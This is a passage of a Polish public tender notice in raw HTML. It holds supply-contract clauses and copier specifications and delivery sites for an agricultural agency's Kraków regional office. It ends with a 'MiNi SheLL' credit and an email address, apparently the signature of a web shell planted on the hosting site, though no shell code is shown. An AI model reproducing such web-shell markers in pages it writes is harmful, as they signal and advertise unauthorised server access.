8 ust. 1.6.	W przypadku uchybienia któregokolwiek z terminów określonych w § 5, niezależnie od jego przyczyn, Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 0,1 % kwoty łącznego wynagrodzenia brutto określonego w § 8 ust. 1 za każdy dzień opóźnienia. Jeżeli opóźnienie przekroczy 7 dni Zamawiającemu przysługuje prawo żądania zapłaty kary umownej w wysokości 10% kwoty łącznego wynagrodzenia brutto określonego w § 8 ust. 1.7.	Jeżeli na skutek niewykonania lub nienależytego wykonania przez Wykonawcę zobowiązań objętych Umową powstanie szkoda przewyższająca zastrzeżoną karę umowną, bądź szkoda powstanie z innych przyczyn niż zastrzeżono karę, Zamawiającemu przysługuje prawo do dochodzenia odszkodowań na zasadach ogólnych.8.	Kwoty związane z odstąpieniem od Umowy oraz kary umowne płatne są w terminie 7 dni od daty otrzymania wezwania od Zamawiającego lub potrącane z przysługującego Wykonawcy wynagrodzenia.9.	Zamawiający może odstąpić od Umowy w terminie 14 dni od zaistnienia przyczyny odstąpienia.§ 8.WYNAGRODZENIE1.	Zamawiający zobowiązuje się zapłacić za odebrany Sprzęt wynagrodzenie łączne, ustalone na podstawie oferty Wykonawcy, w kwocie ................... zł plus należny podatek VAT ................ zł co daje łącznie kwotę brutto ............................ zł (słownie .................................. ). 2.	W kwocie wymienionej w ust.1 mieszczą się koszty transportu, wniesienia Sprzętu do wskazanych lokalizacji, uruchomienia sprzętu, przeszkolenia pracowników Wykonawcy z zakresu obsługi Sprzętu i inne wydatki związane z wykonaniem Umowy.3.	Podstawę do wystawienia faktury stanowić będą Protokoły Odbioru w Miejscu Dostawy, podpisane przez Zamawiającego i Wykonawcę bez żadnych zastrzeżeń.4.	Zapłata nastąpi przelewem na konto Wykonawcy wskazane na fakturze w terminie 21 dni licząc od daty otrzymania przez Zamawiającego poprawnie wystawionej faktury wraz z kompletem podpisanych bez zastrzeżeń Protokołów Odbioru.5.	Strony ustalają, że faktura, o której mowa w niniejszym paragrafie wystawiona zostanie na: Agencja Restrukturyzacji i Modernizacji Rolnictwa, Al. Jana Pawła II 70, 00-175 Warszawa, zaś doręczona na adres: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.6.	Błędnie wystawiona faktura lub brak kompletu podpisanych bez zastrzeżeń Protokołów Odbioru spowodują naliczenie ponownego 21 dniowego terminu płatności od momentu dostarczenia poprawionych lub brakujących dokumentów.7.	Za termin wykonania płatności będzie uważany dzień złożenia przez Zamawiającego dyspozycji przelewu płatności.8.	Zamawiający oświadcza, że jest podatnikiem podatku VAT i jest upoważniony do wystawiania i otrzymywania faktur VAT oraz posiada NIP: 526-19-33-940.9.	Wykonawca oświadcza, że jest podatnikiem podatku VAT i jest upoważniony do wystawiania i otrzymywania faktur VAT oraz posiada NIP: ............................§9ZAWIADOMIENIA1.	Wszelkie zawiadomienia wymienione w Umowie, z wyjątkiem zgłoszeń gwarancyjnych w formach określonych w § 5 ust.4 lit. a-b), niezależnie od nazwy, pod którą występują, dla swojej skuteczności Strony muszą przekazać osobiście za potwierdzeniem odbioru lub pocztą poleconą za zwrotnym poświadczeniem ich odbioru i będą uważane za skutecznie doręczone w dniu ich odbioru.2.	Zawiadomienia, zapytania, informacje, nie wymienione w postanowieniach Umowy mogą być przesyłane faksem, doręczane osobiście, przesyłane kurierem lub listem.3.	Zawiadomienia będą wysyłane na adresy i numery telefaksów podane przez Strony. Każda ze Stron zobowiązana jest do informowania drugiej Strony o każdej zmianie miejsca siedziby lub numeru telefaksu. Jeżeli Strona nie powiadomiła o zmianie miejsca, siedziby lub numeru telefaksu, zawiadomienia wysłane na ostatni znany adres siedziby lub numer telefaksu, Strony uznają za doręczone.4.	Wszelkie terminy określone w Umowie są liczone od Dnia Roboczego następującego po dniu doręczenia pisma.§ 10ZMIANY UMOWY1.	Wszelkie uzupełnienia oraz zmiany treści Umowy wymagają formy pisemnej pod rygorem nieważności.2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem przypadków przewidzianych w specyfikacji istotnych warunków zamówienia w postępowaniu poprzedzającym zawarcie Umowy.§ 11ODSTĄPIENIE OD UMOWYW razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy, Zamawiający może odstąpić od Umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu wykonania części Umowy. § 12POSTANOWIENIA KOŃCOWE1.	W sprawach nie uregulowanych Umową mają zastosowania przepisy Kodeksu cywilnego oraz ustawy Prawo Zamówień Publicznych. 2.	Ewentualne spory mogące wyniknąć na tle wykonania Umowy w przypadku nie osiągnięcia porozumienia w drodze bezpośrednich negocjacji, rozstrzygać będzie sąd powszechny właściwy dla siedziby Zamawiającego.3.	Załączniki wymienione w Umowie stanowią integralną część Umowy.4.	Umowę sporządzono w 4 jednobrzmiących egzemplarzach, w tym jeden egzemplarz dla Wykonawcy i trzy egzemplarze dla Zamawiającego.Wykonawca Zamawiający</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:- działania siły wyższej lub wystąpienia stanu wyższej konieczności,- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach,- niezależnych od wykonawcy okoliczności, które uniemożliwiają dostawę całości lub części asortymentu w terminie wskazanym przez Zamawiającego,- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,- omyłek pisarskich lub błędów rachunkowych,- mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,- jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-07-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta może być sporządzona wyłącznie w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa trzydziestu jeden urządzeń kopiujących A4 monochromatycznych </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Parametr	Urządzenie kopiujące A4 monochromatyczne w liczbie 31 sztuk1	Technologia	Elektrografia laserowa z użyciem tonera proszkowego, utrwalanie tonera bez użycia oleju2	Rozmiar papieru	A4, A5, koperty (C5, DL)3	Szybkość druku	Minimum 50 str./min. A4 (simplex)4	Moduł druku dwustronnego	Zainstalowany w urządzeniu5	Rozdzielczość druku	Minimum 1200x1200 dpi6	Języki druku	PCL5e lub PCL6, emulacja Postscript Level 3, bezpośredni druk dokumentów PDF (w wersji min. 1.4)7	Skaner	ADF min. 100 arkuszy, automatyczny jednoprzebiegowy duplex, skanowanie w kolorze8	Szybkość skanowania jednostronnego	Minimum 50 str./min (Mono)9	Rozdzielczość skanowania	Minimum 600x600 dpi (Mono)10	Funkcje skanowania	Skanowanie do: poczty e-mail, FTP, folderu sieciowego, USB, Zakres powiększania kopii z ADF 25-400%11	Format skanowania	Tiff, jpg, pdf, bezpieczny pdf, xps12	Maksymalna wydajność miesięczna	Nie mniej niż 200 000 stron13	Pojemność podajników papieru	min. 600 arkuszy14	Zainstalowana pamięć	Minimum 256MB, możliwość rozbudowy do min. 1280MB15	Złącza zewnętrzne	Ethernet 10/100, USB 2.016	FAX	33 kb/s17	Obsługiwane systemy operacyjne	dla Microsoft Windows 7-32bit/7-64bit/ 8/8.1-32bit/ 8/8.1-64-bit/ 2003 Server-32bit/ 2003 Server-64bit/2008 Server R2-64bit/2012 Server-64bit (sterownik uniwersalny) instalowany na Windows Server 2003/2008/201218	Obsługa	Kolorowy panel dotykowy z obsługą w języku polskim, urządzenie dodatkowo wyposażone w stolik na kółkach wyprodukowany przez producenta urządzenia 19	Certyfikaty i standardy	Urządzenie musi być produkowane zgodnie z normą Energy Star, urządzenie musi posiadać deklaracje CE20	Materiały eksploatacyjne	Ilość wszystkich materiałów eksploatacyjnych w komplecie z urządzeniem, która pozwoli na wydruk min. 15 000 stron A4 (zgodnie z normą ISO/IEC 19798). Materiały winny być oryginalne (markowane przez producenta drukarek), pełnowartościowe, nieregenerowane i nowe, a ich użycie nie może powodować utraty gwarancji21	Gwarancja	24 miesiące, naprawa w miejscu eksploatacji. Udzielenie gwarancji nie może być uzależnione od zlecania przez Zamawiającego jakichkolwiek odpłatnych przeglądów serwisowych. Jeżeli Wykonawca dla zachowania gwarancji wymaga wykonywania przeglądów ich ewentualny koszt (obejmujący wszystkie niezbędne czynności, materiały, części i dojazd) musi zostać wliczony w cenę urządzenia. Wykonanie ewentualnego przeglądu nie może być uzależnione od ilości kopii, a jedynie od czasu eksploatacji urządzenia i nie wymaga zawiadomienia przez Zamawiającego.Urządzenia muszą zostać dostarczone przez Wykonawcę w miejsca wskazane w poniższej tabeli, a następnie wniesione w miejsce instalacji, rozpakowane i przygotowane do uruchomieniaLp.	Miejsce dostawy Ilość urządzeń monochromatycznych A41	Bochnia, ul. Windakiewicza 9/1 22	Brzesko, ul. Szczepanowska 23 13	Chrzanów, ul. Fabryczna 16 14	Dąbrowa Tarnowska, ul. Piłsudskiego 33 25	Gorlice, ul. W. Pola 2 16	Limanowa, ul. Piłsudskiego 6 17	Myślenice, ul. Słowackiego100A 18	Nowy Sącz, ul. Kraszewskiego 44 19	Nowy Targ, ul. Składowa 7 110	Olkusz, ul. Bylicy 1 111	Oświęcim, ul. Wyspiańskiego 10 112	Proszowice, ul. Krakowska 32 113	Sucha Beskidzka, ul. Mickiewicza 19 114	Tarnów, ul. Krakowska 134 115	Zakopane, ul. Do Samków 29 116	Wadowice, ul. Mickiewicza 36 117	Niepołomice, ul. 3 Maja 2 118	Kraków, ul. Lubicz 25 12Zamawiający wymaga udzielenia przez wykonawców gwarancji na przedmiot zamówienia na minimalny okres co najmniej 24 miesięcy. Okres gwarancji liczony jest od dokonania bezusterkowego odbioru przedmiotu umowy. Zaoferowanie okresu gwarancji krótszego niż 24 miesiące skutkować będzie odrzuceniem oferty. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W przypadku realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez Wykonawcę tych części zamówienia, których wykonanie powierzy podwykonawcom oraz podania firm podwykonawców. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30121100-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 56<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">długość okresu gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">szybkość skanowania</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa trzech urządzeń kopiujących A3 kolorowych </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Parametr	Urządzenie kopiujące A3 kolorowe w liczbie 3 sztuk1	Technologia	Laserowa lub ledowa kolorowa2	Rozmiar papieru	Minimum A3, A4, A5, koperty (C5, DL)3	Szybkość druku	Minimum 50 str./min. (A4, mono); Minimum 45 str./min. (A4,kolor)4	Moduł druku dwustronnego	Zainstalowany w urządzeniu5	Rozdzielczość druku	Minimum 1200x1200 dpi (mono/kolor)6	Języki druku	PCL5e lub PCL6, emulacja Postscript Level 3, bezpośredni druk dokumentów PDF (w wersji min. 1.4)7	Skaner	ADF min. 100 arkuszy, automatyczny duplex, skanowanie w kolorze8	Szybkość skanowania jednostronnego	Minimum 50 str./min (Mono)9	Rozdzielczość skanowania	Minimum 600x600 dpi Mono10	Funkcje skanowania	Skanowanie do: poczty e-mail, FTP, folderu sieciowego, USB, Zakres powiększania kopii z ADF 25-400%11	Format skanowania	Tiff, jpg, pdf, bezpieczny pdf, xps12	Maksymalna wydajność miesięczna	Nie mniej niż 200 000 stron13	Pojemność podajników papieru	min. 1500 arkuszy14	Zainstalowana pamięć	Minimum 1024MB, możliwość rozbudowy do min. 2048MB15	Złącza zewnętrzne	Ethernet 10/100, USB 2.016	FAX	33 kb/s17	Obsługiwane systemy operacyjne	dla Microsoft Windows 7-32bit/7-64bit/ 8/8.1-32bit/ 8/8.1-64-bit/ 2003 Server-32bit/ 2003 Server-64bit/2008 Server R2-64bit/2012 Server-64bit (sterownik uniwersalny) instalowany na Windows Server 2003/2008/201218	Obsługa	Kolorowy panel dotykowy z obsługą w języku polskim, urządzenie dodatkowo wyposażone w stolik na kółkach wyprodukowany przez producenta urządzenia 19	Certyfikaty i standardy	Urządzenie musi być produkowane zgodnie z normą Energy Star, urządzenie musi posiadać deklaracje CE20	Materiały eksploatacyjne	Ilość wszystkich materiałów eksploatacyjnych w komplecie z urządzeniem, która pozwoli na wydruk min. 15 000 stron A4 mono i 10 000 stron A4 kolor (zgodnie z normą ISO/IEC 19752). Materiały winny być oryginalne (markowane przez producenta drukarek), pełnowartościowe, nieregenerowane i nowe, a ich użycie nie może powodować utraty gwarancji21	Gwarancja	24 miesiące, naprawa w miejscu eksploatacji. Udzielenie gwarancji nie może być uzależnione od zlecania przez Zamawiającego jakichkolwiek odpłatnych przeglądów serwisowych. Jeżeli Wykonawca dla zachowania gwarancji wymaga wykonywania przeglądów ich ewentualny koszt (obejmujący wszystkie niezbędne czynności, materiały, części i dojazd) musi zostać wliczony w cenę urządzenia. Wykonanie ewentualnego przeglądu nie może być uzależnione od ilości kopii, a jedynie od czasu eksploatacji urządzenia i nie wymaga zawiadomienia przez Zamawiającego.Urządzenia muszą zostać dostarczone przez Wykonawcę w miejsca wskazane w poniższej tabeli, a następnie wniesione w miejsce instalacji, rozpakowane i przygotowane do uruchomienia. Miejsce dostawy	Ilość urządzeń kolorowych A3: Kraków, ul. Lubicz 25: 3Zamawiający wymaga udzielenia przez wykonawców gwarancji na przedmiot zamówienia na minimalny okres co najmniej 24 miesięcy. Okres gwarancji liczony jest od dokonania bezusterkowego odbioru przedmiotu umowy. Zaoferowanie okresu gwarancji krótszego niż 24 miesiące skutkować będzie odrzuceniem oferty. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W przypadku realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez Wykonawcę tych części zamówienia, których wykonanie powierzy podwykonawcom oraz podania firm podwykonawców. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30121100-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 56<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">długość okresu gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">szybkość skanowania</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com